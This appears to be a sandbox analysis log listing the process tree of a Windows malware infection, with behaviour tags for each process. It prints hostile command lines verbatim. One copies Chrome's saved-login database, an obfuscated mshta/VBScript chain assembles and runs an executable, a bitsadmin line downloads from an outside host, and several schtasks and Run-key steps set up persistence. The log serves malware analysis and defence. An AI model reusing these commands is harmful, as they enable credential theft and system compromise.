C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2684 /prefetch:111⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2008 /prefetch:211⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --mojo-platform-channel-handle=3032 /prefetch:811⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3208 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --mojo-platform-channel-handle=3812 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --mojo-platform-channel-handle=3828 /prefetch:811⤵
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --mojo-platform-channel-handle=1592 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1996,14397569795993278695,12148536012956899324,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3520_908790631" --mojo-platform-channel-handle=2980 /prefetch:811⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17a0d8ec302e.exeMon17a0d8ec302e.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵
-
C:\Windows\SysWOW64\raserver.exe"C:\Windows\SysWOW64\raserver.exe"2⤵
-
C:\Windows\SysWOW64\raserver.exe"C:\Windows\SysWOW64\raserver.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\AnCdctsFOA4Jamj50y1LwMGL.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Program Files (x86)\Dbrhdk08\rhphjohbnz.exe"C:\Program Files (x86)\Dbrhdk08\rhphjohbnz.exe"2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\msfeedssync.exeC:\Windows\system32\msfeedssync.exe sync2⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe2⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\Microsoft.SharePoint.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\Microsoft.SharePoint.exe" /silentConfig3⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"2⤵
- Checks whether UAC is enabled
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\9K3DJ2MFUMeOjSxG5pCVZuLY.exe"C:\Users\Admin\Documents\9K3DJ2MFUMeOjSxG5pCVZuLY.exe"3⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\BPniRZA8ec2l5bbKdT8k38yq.exe"C:\Users\Admin\Pictures\Adobe Films\BPniRZA8ec2l5bbKdT8k38yq.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\7Sx91zJmTpk5gOx1oDuDBfK4.exe"C:\Users\Admin\Pictures\Adobe Films\7Sx91zJmTpk5gOx1oDuDBfK4.exe"4⤵
- Checks computer location settings
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 6565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 6765⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 7285⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 8245⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\_Dxyo_DVBO3JsNIGI7EgAr6m.exe"C:\Users\Admin\Pictures\Adobe Films\_Dxyo_DVBO3JsNIGI7EgAr6m.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\nGdxsk2KUUvWLa38jntBaA3f.exe"C:\Users\Admin\Pictures\Adobe Films\nGdxsk2KUUvWLa38jntBaA3f.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\Wb23GneurBcrYvvdZol9iJLC.exe"C:\Users\Admin\Pictures\Adobe Films\Wb23GneurBcrYvvdZol9iJLC.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\Wb23GneurBcrYvvdZol9iJLC.exe"C:\Users\Admin\Pictures\Adobe Films\Wb23GneurBcrYvvdZol9iJLC.exe" -u5⤵
-
C:\Users\Admin\Pictures\Adobe Films\12kod2VY4w_aJH6F93dV5zt5.exe"C:\Users\Admin\Pictures\Adobe Films\12kod2VY4w_aJH6F93dV5zt5.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\12kod2VY4w_aJH6F93dV5zt5.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\12kod2VY4w_aJH6F93dV5zt5.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )5⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\12kod2VY4w_aJH6F93dV5zt5.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\12kod2VY4w_aJH6F93dV5zt5.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "12kod2VY4w_aJH6F93dV5zt5.exe"7⤵
- Drops file in Windows directory
- Kills process with taskkill
- Modifies registry class
-
C:\Users\Admin\Pictures\Adobe Films\llWqBB3BS0gK_yeEmxFt5VxY.exe"C:\Users\Admin\Pictures\Adobe Films\llWqBB3BS0gK_yeEmxFt5VxY.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\cmHfofMk0KBLXUYfsI02YUE3.exe"C:\Users\Admin\Pictures\Adobe Films\cmHfofMk0KBLXUYfsI02YUE3.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-INMQ4.tmp\cmHfofMk0KBLXUYfsI02YUE3.tmp"C:\Users\Admin\AppData\Local\Temp\is-INMQ4.tmp\cmHfofMk0KBLXUYfsI02YUE3.tmp" /SL5="$10072E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\cmHfofMk0KBLXUYfsI02YUE3.exe"5⤵
- Checks whether UAC is enabled
- Enumerates connected drives
-
C:\Users\Admin\AppData\Local\Temp\is-03QE0.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-03QE0.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\64-7dd0e-d1e-a88bc-8e574d1941289\Luqywaeneju.exe"C:\Users\Admin\AppData\Local\Temp\64-7dd0e-d1e-a88bc-8e574d1941289\Luqywaeneju.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gf5bb4m3.prp\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\gf5bb4m3.prp\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\gf5bb4m3.prp\GcleanerEU.exe /eufive9⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ls4cbbj5.e3m\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ls4cbbj5.e3m\installer.exeC:\Users\Admin\AppData\Local\Temp\ls4cbbj5.e3m\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ptmd5d25.xsj\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ptmd5d25.xsj\any.exeC:\Users\Admin\AppData\Local\Temp\ptmd5d25.xsj\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ptmd5d25.xsj\any.exe"C:\Users\Admin\AppData\Local\Temp\ptmd5d25.xsj\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqpezftg.ocx\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\yqpezftg.ocx\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\yqpezftg.ocx\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yw0dfxjq.ux3\autosubplayer.exe /S & exit8⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iy551leq.0ru\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\iy551leq.0ru\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\iy551leq.0ru\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 65210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 66810⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 69210⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 80810⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 87610⤵
- Program crash
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 94010⤵
- Program crash
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 109210⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bwlsc02n.jzg\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\bwlsc02n.jzg\installer.exeC:\Users\Admin\AppData\Local\Temp\bwlsc02n.jzg\installer.exe /qn CAMPAIGN="654"9⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i2it4rtq.mys\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\i2it4rtq.mys\any.exeC:\Users\Admin\AppData\Local\Temp\i2it4rtq.mys\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\i2it4rtq.mys\any.exe"C:\Users\Admin\AppData\Local\Temp\i2it4rtq.mys\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eys15b1q.mit\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\eys15b1q.mit\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\eys15b1q.mit\gcleaner.exe /mixfive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eejlsk3j.nqc\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\eejlsk3j.nqc\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\eejlsk3j.nqc\autosubplayer.exe /S9⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdE56D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdE56D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdE56D.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdE56D.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdE56D.tmp\tempfile.ps1"10⤵
- Blocklisted process makes network request
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdE56D.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdE56D.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\PChf_dwj5Cc7WQ9PvxALD1pc.exe"C:\Users\Admin\Pictures\Adobe Films\PChf_dwj5Cc7WQ9PvxALD1pc.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"6⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d8,0x1d4,0x1d0,0x180,0x1f8,0x7ff87a8cdec0,0x7ff87a8cded0,0x7ff87a8cdee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1656,5948516999102193728,12480293718497710207,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8120_1521795980" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1676 /prefetch:27⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,5948516999102193728,12480293718497710207,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8120_1521795980" --mojo-platform-channel-handle=1904 /prefetch:87⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\vwcireuC:\Users\Admin\AppData\Roaming\vwcireu2⤵
- Checks SCSI registry key(s)
-
